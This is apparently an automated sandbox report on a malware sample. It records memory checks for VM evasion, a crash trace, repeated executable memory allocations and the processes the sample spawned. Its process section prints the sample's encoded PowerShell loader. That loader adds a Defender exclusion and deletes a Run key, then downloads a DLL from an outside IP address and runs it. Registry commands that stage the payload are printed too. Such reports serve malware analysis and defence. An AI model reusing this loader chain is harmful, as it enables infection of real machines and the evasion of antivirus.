CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00446468 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 7, 2023, 9:58 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ March 7, 2023, 9:58 a.m.	stacktrace: CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75aad08c TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75aa964b TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75a94d6b TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75a96f7c CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75a9e825 TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75a96002 TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75a95fe8 TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75a949e3 TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75a95a20 RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x76f49a91 LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x76f68f10 RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x76f68e5c ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x755c7a25 wscript+0x2fbd @ 0xfe2fbd BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25 exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4 exception.instruction: call dword ptr [ecx + 0xc] exception.module: MSCTF.dll exception.exception_code: 0xc0000005 exception.offset: 278260 exception.address: 0x75ac3ef4 registers.esp: 2292028 registers.edi: 0 registers.eax: 41544616 registers.ebp: 2292056 registers.edx: 1 registers.ebx: 0 registers.esi: 51187152 registers.ecx: 1932080604	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

March 7, 2023, 9:58 a.m.

stacktrace:

CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75aad08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75aa964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75a94d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75a96f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75a9e825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75a96002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75a95fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75a949e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75a95a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x76f49a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x76f68f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x76f68e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x755c7a25
wscript+0x2fbd @ 0xfe2fbd
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x75ac3ef4
registers.esp: 2292028
registers.edi: 0
registers.eax: 41544616
registers.ebp: 2292056
registers.edx: 1
registers.ebx: 0
registers.esi: 51187152
registers.ecx: 1932080604

Allocates read-write-execute memory (usually to unpack itself) (50 out of 277 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02701000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02702000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f97000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f65000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f66000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f83000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f84000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f85000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f86000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f87000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f89000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powershell $CondiddlingDeliberatively = Get-ItemProperty -Path HKCU:\SOFTWARE\CondiddlingDeliberatively \| %{$_.maliceproof}; powershell -windowstyle Minimized -encodedcommand "JABNAGUAYQBnAGU$CondiddlingDeliberatively"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $CondiddlingDeliberatively = Get-ItemProperty -Path HKCU:\SOFTWARE\CondiddlingDeliberatively \| %{$_.maliceproof}; powershell -windowstyle Minimized -encodedcommand "JABNAGUAYQBnAGU$CondiddlingDeliberatively"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAdgBvAGkAZABhAGIAbABlAG4AZQBzAHMAVQBuAGYAaQBsAGUALgBkAGwAbAAsAFIAUwAzADIAOwA=

A process created a hidden window (7 events)

Time & API	Arguments	Status	Return
ShellExecuteExW March 7, 2023, 9:58 a.m.	show_type: 0 filepath_r: reg parameters: add HKCU\SOFTWARE\VicariousPluton /v isatine /d CfCuLyndhuohVhHxOHrXeXrWuuaJOOAcwxwmDjhFeIdivrzKrgukrxouNzGqOujwhqzAoxkutLnKiyVdvADKphHFrTjVxRjpSwIgOUepydHTopBGXHiwNpKGwgxhWLrYEKnppsCAlQsxWIdCapIslWOwbldEMdiPprvvzpWNLqYAxilvFQtyBlfxYrKbHKsOARoIYpjcEkpHRSwFrqHBhiiIKHGPgJANDGJmXETGkrqAubmuTuzZZdYDEwMVZxOjHYImTqWwlSbSgOIksGmrgsWWOtdXjqEMu filepath: reg	1	1
ShellExecuteExW March 7, 2023, 9:58 a.m.	show_type: 0 filepath_r: reg parameters: add HKCU\SOFTWARE\CondiddlingDeliberatively /v maliceproof /d AcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAFYAaQBjAGEAcgBpAG8AdQBzAFAAbAB1AHQAbwBuACAAfAAgACUAewAkAF8ALgBtAGEAbABpAGMAZQBwAHIAbwBvAGYAfQA7ACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgAgAD0AIAAiAEkAcwBsAGEAbgBkAGUAcgBzACIAIAArACAAJABNAGUAYQBnAGUAcgBEAGkAcwBzAGUAcgB0AGEAdABpAG8AbgA7ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoAZgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBlAGEAZwBlAHIARABpAHMAcwBlAHIAdABhAHQAaQBvAG4AKQApADsAIABbAGMAbABhAHMAcwBpAGMAeQBjADEAXQA6ADoARQB4AGUAYwB1AHQAZQAoACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQB4AGUAYwB1AHQAaQBvAG4AcABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAiACIAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlACAAPQAgAGAAKABnAGUAdAAtAGwAbwBjAGEAdABpAG8AbgBgACkALgBEAHIAaQB2AGUALgBOAGEAbQBlACAAKwAgACcAOgBcACcAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABgACQAYwB1AHIAcgBlAG4AdABEAHIAaQB2AGUAOwByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAvAHYAIABVAHMAZQByAGkAbgBpAHQAIAAvAGYAOwAgAHIAZQBnACAAZABlAGwAZQB0AGUAIABIAEsARQBZAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAXABTAE8ARgBUAFcAQQBSAEUAXABWAGkAYwBhAHIAaQBvAHUAcwBQAGwAdQB0AG8AbgAgAC8AdgAgAG0AYQBsAGkAYwBlAHAAcgBvAG8AZgAgAC8AZgAiACIAIgApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADQAMgAuADkAMwAuADIANQAwAC4AMQA1ADIALwB1AG0AVQBBADYAUwBoAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXAB2AG8AaQBkAGEAYgBsAGUAbgBlAHMAcwBVAG4AZgBpAGwAZQAuAGQAbABsADsAIAByAHUAbgBkAGw